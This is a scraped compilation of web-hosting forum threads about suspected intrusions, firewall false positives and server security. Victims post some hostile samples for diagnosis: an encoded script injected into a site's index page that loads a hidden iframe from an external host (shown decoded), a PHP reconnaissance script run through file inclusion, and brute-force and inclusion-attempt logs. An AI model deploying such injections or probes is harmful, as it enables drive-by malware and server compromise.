Lfd Warning: Hack Attempt Or Legit

May 18, 2009

Code:

Mon May 18 15:17:08 2009 lfd: *Suspicious File* /tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan [someuser:someuser
] - Suspicious directory
The 'someuser' is a legitimate user on the server, an auto body website setup last October.

The content of the directory:

Quote:

root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/CPAN]# ls -lh
total 3.0K
drwx------ 2 someuser someuser 1.0K May 16 17:54 ./
drwx------ 3 someuser someuser 1.0K May 16 17:54 ../
-rw-r--r-- 1 someuser someuser 361 May 16 17:54 MyConfig.pm

File content:

Code:
$CPAN::Config->{'cpan_home'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan";
$CPAN::Config->{'build_dir'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/build";
$CPAN::Config->{'histfile'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/histfile";
$CPAN::Config->{'keep_source_where'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/sources";
1;
__END__

Code:
root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpcpan/STABLE]# ls -lh
total 3.0K
drwx------ 2 someuser someuser 1.0K May 16 17:54 ./
drwx------ 3 someuser someuser 1.0K May 16 17:54 ../
-rw-r--r-- 1 someuser someuser 735 May 16 17:54 modules.versions

View 0 Replies


ADVERTISEMENT

Hack Attempt

Jan 31, 2007

I have started seeing the following error in the Event Viewer every day:

"An anonymous session connected from xxx.xxx.xxx.xxx has attempted to open an LSA policy handle on this machine. The attempt was rejected with STATUS_ACCESS_DENIED to prevent leaking security sensitive information to the anonymous caller. The application that made this attempt needs to be fixed. Please contact the application vendor. As a temporary workaround, this security measure can be disabled by setting the HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaTurnOffAnonymousBlock DWORD value to 1. This message will be logged at most once a day."

The IP address is different every time. It is not an internal IP address or any I recognize. It is from the outside. I have read about this in the Microsoft site but it only mentioned how it might be an internal service/application attempting the access. This is not my case since I am seeing remote IP addresses. Anyone can help me dig deeper into this? How can I find out more about what's going on?

View 3 Replies View Related

Notifying DC Of Hack Attempt

May 30, 2007

Usually I just block offending machines that try to get into our systems and move on but for the last 2 days I have started notifying the contacts on the arin info for offending IP's. I guess I am trying to do my part to make the internet a better place?

Is this stuff largely ignored?

Is anyone else doing this?

Is there an easier way?

View 14 Replies View Related

Hack Attempt? I'm Pretty Sure...

Jul 8, 2007

A new client has just opened up an account and the first thing hes installed at a few scripts called r57shell and c99shell. I'm not very familiar with these two scripts, but by the looks of them their root kits of some sort. Amd I correct in thinking this?

The account has been susspended for the time being.

View 12 Replies View Related

Index.php Not Working After Hack Attempt

Jun 24, 2008

I had an untapped image upload site on my server which i forgot. Some guys or children upload something noxious and neutralize all the "index.php". This was a hack attempt with SSH.

We noticed that, close this account delete uploaded files. But there is a quirky problem. Any of index.php's isn't working after this attempt. Index file is working after change its name, example "mindex.php".

We updated all the services, rebuild apache but don't working. We can't use any index.php on the server.

Additionally, there are 34 possible trojans appear on the server. I tried to delete them with BitDefender but can't do that.( I checked that WHM / Scan for Trojan Horses )

View 7 Replies View Related

Captured Hack Attempt - PHPCoin URL Hole

Jun 25, 2007

Just an FYI - we have been monitoring some attempts from europe. Here is a file that they were trying to include using a hole in PHPCoin's URL handler:

[URL removed] stringa.txt

The attempt was coming from linux.htd-information.dk

View 3 Replies View Related

Webhostmagazine.com Reviews - Legit

Jan 14, 2008

webhostmagazine.com have their own hosting reviews, does anyone have any experience or opinions with reards to the reliability or integrity of these reviews?

Im not one to take such things at face value.

View 4 Replies View Related

Is Hyperspin Rankings Legit

Jul 26, 2008

[url]

is this a trustworthy and accurate resource?

View 12 Replies View Related

APF Blocking Legit Users

Aug 21, 2007

This is just a notice: one of the staff of a large site I run was no longer able to log into the site. As it turns out his IP was being blocked by APF.

The reason for his IP being blocked was that it ended in 255 (x.x.x.255). Any such addresses are blocked by the PKT_SANITY_STUFFED option, which is turned on by default in recent versions of APF. When restarting APF this option shows up as {pkt_sanity} deny all to/from 0.0.0.255/0.0.0.255 and can be seen under "OUT_SANITY" when doing "apf --list".

As you notice the problem is that some ISPs are are assigning supposedly "bad" IPs ending in 255 to users. And I'm not the only one hitting this problem either: [url]

If you are also using (a recent version of) APF, you might want to turn this option OFF.

In the meanwhile, if anyone is so enlighted... why was this option in APF in the first place? What so bad about IPs ending on 255? The APF docs say they're bad broadcast addresses, so why are ISP assigning them anyway? Who is at fault: APF or ISPs?

View 3 Replies View Related

Legit Backup Script

Jan 10, 2007

I got this from 1and1 and have no confidence in them. I want to be sure my site is backed up (I will be using bq and whoever the new host is to back it up also) I have done these commands and it "backs up" and then I FTP the backup to my computer but I want to be sure there is actually information in that backup. Does this sound legit?

Open Putty
login
at command, type

mysqldump --opt -Q -h localhost -databaseusername -p databasename >sitename.backup.sql
hit enter
it goes to next line and is done
then FTP to my computer and I have a backup.

So first, does it sound legit? Second, what do I DO with it should my site go down. Do I just FTP it back to the server?

View 9 Replies View Related

HostJury Deleted Legit Reviews

Dec 15, 2008

I wanted to post about a site I'm very concerned and frustrated with, HostJury.

It's simple. The other day, one of our web hosting customers posted our HostJury URL in our customer forums. Since then, a few of our customers saw followed the link and decided to submit reviews about us, which was very pleasing.

Friday night, I saw we had our first 4 reviews. Suddenly yesterday (Saturday) afternoon I checked on the page, and saw all of them had been deleted.

But I looked up the reviewers. They were all posted by legit customers of ours which I was able to find in our customer database, so the reviews are definitely legit.

I am especially frustrated as those 4 had rated us very high, so these are important reviews that have been removed by HostJury.

I don't understand what's going on here...

o Legit reviews
o We didn't ask them to review us, they did it on their own
o We didn't bribe our reviewers
o We didn't reward our reviewers

So what's the problem, HostJury? These kind of instances are interfering with honesty in the hosting industry.

View 10 Replies View Related

Mod_evasive Bans Some Legit Apps

Dec 10, 2007

mod_evasive bans some of the legit users (galleries , typo3 etc.) with following settings:

<IfModule mod_dosevasive20.c>
DOSHashTableSize 3097
DOSPageCount 10
DOSSiteCount 150
DOSPageInterval 1
DOSSiteInterval 3
DOSBlockingPeriod 10
</IfModule>

Somebody have an idea for some less restrictive but still usefull rules?

View 10 Replies View Related

Allowing Legit Traffic Permanently (CSF Iptables)

Oct 29, 2007

My server runs on CSF.

Very often the firewall automatically ban some of my customers IP who has fix IP to access to their webmail and website, because they have over 100 staffs, maybe that is why the IP was banned automatically for having too many connections to the server.

Everytime I unban the IP, it keeps being banned again. I have to stop / restart iptables to flush it.

How can I allow the IP permanently?

View 1 Replies View Related

Apache :: Seemingly Legit Requests Generating 400 Bad Request Errors

Feb 8, 2015

So I've got a problem where a small percentage of incoming requests are resulting in "400 bad request" errors and I could really use some input. At first I thought they were just caused by malicious spiders, scrapers, etc. but they seem to be legitimate requests.

I'm running Apache 2.2.15 and mod_perl2.

The first thing I did was turn on mod_logio and interestingly enough, for every request where this happens the request headers are between 8000-9000 bytes, whereas with most requests it's under 1000. Hmm.

There are a lot of cookies being set, and it's happening across all browsers and operating systems, so I assumed it had to be related to bad or "corrupted" cookies somehow - but it's not.

I added "%{Cookie}i" to my LogFormat directive hoping that would provide some clues, but as it turns out half the time the 400 error is returned the client doesn't even have a cookie. Darn.

Next I fired up mod_log_forensic hoping to be able to see ALL the request headers, but as luck would have it nothing is logged when it happens. I guess Apache is returning the 400 error before the forensic module gets to do its logging?

By the way, when this happens I see this in the error log:

request failed: error reading the headers

To me this says Apache doesn't like something about the raw incoming request, rather than a problem with our rewriting, etc. Or am I misunderstanding the error?

I'm at a loss where to go from here. Is there some other way that I can easily see all the request headers? I feel like that's the only thing that will possibly provide a clue as to what's going on.

View 1 Replies View Related

Possible Break-in Attempt

Mar 19, 2008

I have reported this to BurstNET admin/abuse/NOC and have added a line to block them for now.

Does this belong to anyone??? Nslookup/dig reveals nothing.

This is my /var/log/messages
Mar 19 19:24:50 ginger sshd[11565]: Failed password for root from 66.197.245.241 port 46346 ssh2
Mar 19 19:24:50 ginger sshd[11565]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:51 ginger sshd[11567]: Failed password for root from 66.197.245.241 port 46407 ssh2
Mar 19 19:24:52 ginger sshd[11567]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:53 ginger sshd[11569]: Failed password for root from 66.197.245.241 port 46468 ssh2
Mar 19 19:24:53 ginger sshd[11569]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:55 ginger sshd[11571]: Failed password for root from 66.197.245.241 port 46531 ssh2
Mar 19 19:24:55 ginger sshd[11571]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:57 ginger sshd[11573]: Failed password for root from 66.197.245.241 port 46584 ssh2
Mar 19 19:24:57 ginger sshd[11573]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - !POSSIBLE BREAK-IN ATTEMPT

View 7 Replies View Related

Is This A Hacking Attempt

Feb 22, 2007

my referals logs that I keep on a website, I have come accross the following this morning, Is this some one who is trying to gain access to the server etc.

[url]
[url]
[url]
[url]
[url]

I have the Ip addresses that they have come from and it resolves to a Russian (I Think) website.

Im just looking through all the folders on the server now and no data has been comprimised as far as I can see and im going to use the query strings in order to block access and also deny access via ip address.

View 1 Replies View Related

Hacking Attempt

Sep 13, 2007

see the log entries below:

LogFormat "%h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i" "%{X-Forwarded-For}i""

1.2.3.4 - -[12/Sep/2007:11:15:38 +0900] "GET /~kjm/security/ml-archive/bugtraq/2006.04/msg00283.html//footer.inc.php?settings[footer]=[url]HTTP/1.1" 404 268 "-" "libwww-perl/5.808" "-"

1.2.3.4 - - [12/Sep/2007:11:16:00 +0900] "GET //footer.inc.php?settings[footer]=[url] HTTP/1.1" 404 213 "-" "libwww-perl/5.808" "-"

What can you say from the above log entries?

View 1 Replies View Related

Hack

Sep 26, 2007

recently i found that a javascript code is appended to my index.aspx file on the server !

here is the code :

Code:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%

69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%34%39%61%30%36%30%34%33%61%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c%6f%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%

6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%31%30%38%34%29%2b%27%35%32%30%62%33%36%35%30%33%5c%27%20%77%69%64%74%68%3d%37%

36%20%68%65%69%67%68%74%3d%34%30%39%20%73%74%79%6c%65%3d%5c%27%64%
69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%

65%3e%27%29")); </script>
and this is the decoded one :

Code:
window.status='Done';document.write('<iframe name=749a06043a src='http://alltraff.ru/lol.php?'+Math.round(Math.random()*31084)+'520b36503' width=76 height=409 style='display: none'></iframe>')
i need to know 2 things :
1- is it possible that my developer did something wrong and hackers can append anything to his code ? . or it is a server issue and my host provider servers hacked !?
2- does anybody know anything about this piece of code ? (i dont mean it's action , i want to know ! is it known ?)

View 9 Replies View Related

Are They Going To Hack Me

Oct 27, 2007

When I check statistics for my site, I got this link: [url]

When I click on this site, it run very strange. Are they going to hack me or what they want to do with my site by using the scripts on their site?

after checking this: [url]

View 3 Replies View Related

Possible Hack

Oct 3, 2007

I have searched and searched but can't find anything related here, on Cpanel.net or through google.

I have a Linux/Cpanel machine. Hosts about 15-20 websites. No matter which site you try to visit it is redirected to some malware site or something that tries to get you download a program (Clearly a virus or trojan).

I cannot find any info on this or how to even stop the redirects.

View 14 Replies View Related

Hacking Attempt On Site

Jul 20, 2008

I am having issue with my server. Someone is trying to execute some code and possibly trying mysql injection method.

I have pasted the code below.

Please suggest what can be done in this case.

Regards
Gagandeep

+++++++++++

The person tried to use different IPs and different websites to execute the code.

URL >> IP

[url]

[url]

[url]

ftp://212.11.127.86/tmp/trem/1? >> 87.118.118.156

There are many such queries under my logs.

The person is using different IPs, so, i can't even block that many IPs.

++++++++++++

The CODE

<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }

echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
?>

View 5 Replies View Related

Someone From The Planet Trying To Hack In

Jun 11, 2008

My firewalls block IP's from multiple failed login attempts. The FW on one server has been blocking someone from The Planet. My servers are at GNAX, so why is someone from TP trying to get in?

This is what the system emails tell me:

IP: 70.87.XX.X (2.27.XXXX.static.theplanet.com)
Failures: 5 (sshd)
Interval: 95 seconds
Blocked: Yes

View 4 Replies View Related

How Do I Un-hack My Site

Sep 5, 2007

I haven't really delved into it yet but my wife and I have a personal website with pictures and what-not which was hacked by some Saudi Arabian hacker

site is www.nickandkathi.com

I dont' have the index files with me but is all Ineed to do just re-load my index page on my PC to my file? I'm hosted with hostgator.

How do I stop this from happening again?

View 5 Replies View Related

Someone Try To Hack My Password

May 29, 2007

May 28 16:23:06 server sshd(pam_unix)[13017]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root

I got so many of this line in my server log.

First of all, where is the server log located anyway? I got this from SIM.

May 28 16:23:09 server sshd(pam_unix)[13037]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:11 server sshd(pam_unix)[13045]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:11 server sshd(pam_unix)[13061]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:13 server sshd(pam_unix)[13066]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:13 server sshd(pam_unix)[13067]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:13 server sshd(pam_unix)[13071]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 17:00:02 server ntpdate[19626]: adjust time server 192.5.41.40 offset 0.343837 sec May 28 18:00:07 server ntpdate[28711]: adjust time server 192.5.41.40 offset 0.344493 sec May 28 19:00:06 server ntpdate[3218]: adjust time server 192.5.41.40 offset 0.342326 sec May 28 20:00:02 server ntpdate[8283]: adjust time server 192.5.41.40 offset 0.341603 sec May 28 21:00:07 server ntpdate[13899]: adjust time server 192.5.41.40 offset 0.343715 sec May 28 21:37:45 server sshd(pam_unix)[17268]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root May 28 21:37:45 server sshd(pam_unix)[17271]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root May 28 21:37:45 server sshd(pam_unix)[17270]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root May 28 21:37:45 server sshd(pam_unix)[17254]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root

View 13 Replies View Related

CPanel Login Attempt Failed

Jun 9, 2009

I have not been able to login to my cPanel from my desktop which runs WinXP service Pack3. Both Firefox and Internet Explorer returns the following error message

Login Attempt Failed!

Also, I am unable to connect using Filezilla Client.

However, I am able to connect to the same cPanel on my colleague's desktop which runs WinXP service Pack3 using Firefox browser or IE. We both share the same internet modem.

- I have cleared all the cookies and private data on my desktop. Still the problem persist.

- I changed to a different user on my desktop, but still could not login.

- I changed my desktop IP address but still I could not log in.

I use DSLinux from within Innotek Virtual Box and I was able to login to the same cPanel with the same details that were rejected under WinXP.

Please anyone with a solution should please advise me on what to do. Thanks in advance.

It is not convenient going to my colleagues desk to access my cPanel.

View 15 Replies View Related

Attempt To Install RoR, Libsafe Stops Me

Apr 12, 2008

whenever I attempt to install RoR, libsafe stops me, how do I diable libsafe so I can install RoR, then re-enable libsafe.

[root@server1 ~]# gem install rails --include-dependencies
Libsafe version 2.0.16
Detected an attempt to write across stack boundary.

Terminating /usr/bin/ruby-bin.
uid=0 euid=0 pid=20960
Call stack:
0x4c0e6871 /lib/libsafe.so.2.0.16
0x4c0e6c5d /lib/libsafe.so.2.0.16
0x80549b8 /usr/bin/ruby-bin
0x8054a52 /usr/bin/ruby-bin
0x80556af /usr/bin/ruby-bin .....

View 0 Replies View Related

AWStats Exploit Attempt Prevention

Jun 4, 2008

one of my clients seems to be attracting unwanted attention, it seems as if bots or something along those lines are attempting to exploit my box, while they are unsuccessful it would seem. I was wdonering if there was a rule I could put in Mod_Security that would ban them for attempting to

GET "/awstatsf/logger.php?action=log&type=Hybrid&host=hacked101&"

View 0 Replies View Related

Client Threatning To Hack

Apr 9, 2009

I just had a client whose hosting account was automatically suspended due to him not paying the hosting bill. He opened up a ticket and asked why his site is suspended. I informed him that he didn't pay the bill and the system suspended it automatically. I told him that the system generated e-mails as well and he said he didn't get them while I looked in WHCMS, it said it DID get sent to him. Client said his website was DDOS'd because it used 3 GB of BW in one month and i told him there was no DDOS attack. The kind of site he had (100+ users online at one time, vBulletin forum), it was common to use that much.

The client is now saying that he is going to hack attempt the servers to see if they are DDOS Protected or not. Of Course, my servers are protected (WiredTree), so should I be worried?

His quote:

Quote:

I'LL TEST TO SEE IF YOU HAVE DDOS PROTECTION...TIME TO GATHER MY HACKING BUDDYS.

Also, I have notified WiredTree about this just right now.

View 14 Replies View Related

Possible Root Level Hack

Apr 28, 2009

I believe my server has been hacked as I did the top and observe as follows

top - 15:53:39 up 12 days, 3:16, 2 users, load average: 7.87, 10.30, 11.10
Tasks: 789 total, 3 running, 771 sleeping, 0 stopped, 15 zombie
Cpu(s): 20.4% us, 9.3% sy, 4.8% ni, 35.0% id, 30.1% wa, 0.4% hi, 0.0% si
Mem: 2074364k total, 2048296k used, 26068k free, 72136k buffers
Swap: 2040244k total, 2076k used, 2038168k free, 1286884k cached

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
22488 root 27 12 3376 1352 508 R 16.8 0.1 12:08.63 rsync
15370 named 20 0 84020 30m 1936 S 4.2 1.5 20:15.72 named
16732 root 16 0 4684 1456 868 S 2.9 0.1 0:01.07 ftp
22489 root 27 12 5444 1860 1420 R 2.9 0.1 3:27.51 ssh
26448 mailnull 17 0 9016 4088 2832 D 2.9 0.2 0:00.11 exim
26436 mailnull 16 0 0 0 0 Z 2.4 0.0 0:00.09 exim <defunct>
477 root 15 0 0 0 0 D 2.1 0.0 217:34.28 kjournald
26408 mailnull 16 0 8964 4584 3244 D 2.1 0.2 0:00.08 exim
26442 mailnull 16 0 0 0 0 Z 2.1 0.0 0:00.08 exim <defunct>
16975 root 15 0 4684 1444 856 S 1.6 0.1 0:00.56 ftp
23071 root 16 0 3760 1420 764 R 1.6 0.1 0:05.08 top
26477 root 16 0 8616 3892 2656 D 1.6 0.2 0:00.06 exim
26486 root 15 0 9420 3888 2656 D 1.3 0.2 0:00.05 exim
16694 root 15 0 4684 1436 848 S 1.0 0.1 0:00.63 ftp
16840 root 15 0 4684 1448 860 S 1.0 0.1 0:00.43 ftp
16865 root 15 0 4684 1444 856 S 1.0 0.1 0:00.72 ftp
16932 root 15 0 4684 1444 856 S 1.0 0.1 0:00.42 ftp
17275 root 15 0 4684 1448 860 S 1.0 0.1 0:00.57 ftp
26434 mailnull 16 0 8972 3956 2704 D 1.0 0.2 0:00.04 exim
26437 mailnull 15 0 8964 3920 2688 D 1.0 0.2 0:00.04 exim
26451 mailnull 15 0 8968 3932 2696 S 1.0 0.2 0:00.04 exim
26489 root 18 0 10568 3912 2656 S 1.0 0.2 0:00.04 exim
5310 root 15 0 40104 35m 1888 S 0.8 1.8 10:55.77 tailwatchd
16771 root 15 0 4684 1448 860 S 0.8 0.1 0:00.44 ftp
16779 root 15 0 4684 1448 860 S 0.8 0.1 0:00.56 ftp
16806 root 16 0 4684 1444 856 S 0.8 0.1 0:00.71 ftp
16844 root 15 0 4684 1440 852 S 0.8 0.1 0:00.57 ftp
16854 root 15 0 4684 1444 856 S 0.8 0.1 0:00.72 ftp
16857 root 15 0 4684 1444 856 S 0.8 0.1 0:00.63 ftp
16868 root 15 0 4684 1448 860 S 0.8 0.1 0:00.79 ftp
16885 root 15 0 4684 1448 860 S 0.8 0.1 0:00.68 ftp
16982 root 15 0 4684 1440 852 S 0.8 0.1 0:00.40 ftp
17008 root 16 0 4684 1448 860 S 0.8 0.1 0:00.69 ftp
17038 root 15 0 4684 1448 860 S 0.8 0.1 0:01.01 ftp
17082 root 15 0 4684 1448 860 S 0.8 0.1 0:00.71 ftp
17106 root 15 0 4684 1444 856 S 0.8 0.1 0:00.84 ftp
17288 root 16 0 4684 1448 860 S 0.8 0.1 0:00.69 ftp

Now..I am logged in root in two terminals and it shows

root pts/2 Apr 28 15:19 (x.x.x.x)
root pts/3 Apr 28 14:06 (x.x.x.x)

I am just wondering how can the root perform ftp tasks where my root login is sitting idle and what about pts/0 and pts/1

I stopped the ftp service in cpanel and it is started automatically..

View 14 Replies View Related

Hack Erases 100,000 Websites

Jun 9, 2009

Don't know if anyone else saw this.

[url]

Once again points out the importance of backups.

View 5 Replies View Related

What's Your Take On This Email Hack Scenario

Feb 26, 2008

I'm not a server admin, but help my client with basic it tasks...we built their website for them and just sort of fell into helping them out when they need it. My client has a vps with knownhost, the vps is only used for hosting the email for their domain, the website is hosted on another server. 4 days ago, I logged in and checked the mail queue and found thousands of emails in the queue that were phishing emails trying to get passwords from the recipients for a service called moneybookers.com. According to knownhost, the hacker had guessed the password of one of the email accounts and had started sending mail through it. The hacked account was deleted that day as it was a test account and was not needed anyways. As soon as the account was deleted, the phishing mails stopped being sent. Knownhost reassured us the server hadn't been breached, but we changed the root password anyways. Around 15k to 20k emails were sent in a 14 hour period. Since that time we have appeared on a few blacklsts and have a negative senderbase score and so any company that uses senderbase is obviously rejecting our mail... My client has just hired assuretymail services to get accredited and has invested a lot of money into streamlining mail delivery, so this is obviously devastating to them.

Today I logged in and again found 1000's of email in queue, yet again, and this time they were paypal phishing emails. I immediately changed the passwords of all 50 of the email accounts, including the root. It looks like around 14k or so emails were sent.

Trying to understand how this could happen yet again, knownhost is saying that, yet again the account "test", the same account used last time was used for sending out emails. I was confused by how a previously deleted account could be used to again begin sending emails even though it was deleted 4 days ago. According to knownhost "[FONT='Verdana','sans-serif']The only reasonable explanation for this activity would be that exim cached credentials for system user "test" and didn't refresh its internal cache since the moment when "test" account was removed. To force exim to refresh the cache exim mail server was restarted on your system, so it shouldn't be possible to use that (non-existent) account again to relay the mail through your system."[/FONT]

[FONT='Verdana','sans-serif'][/FONT]
[FONT='Verdana','sans-serif']Being that I'm not a server admin and I rely on knownhost for server admin basics, am I out of line thinking that knownhost dropped the ball here? I mean is it obvious that a restart was in order after the first hack or is this just a bad chance scenario. Is the scenario they are describing plausible?[/FONT]

View 1 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved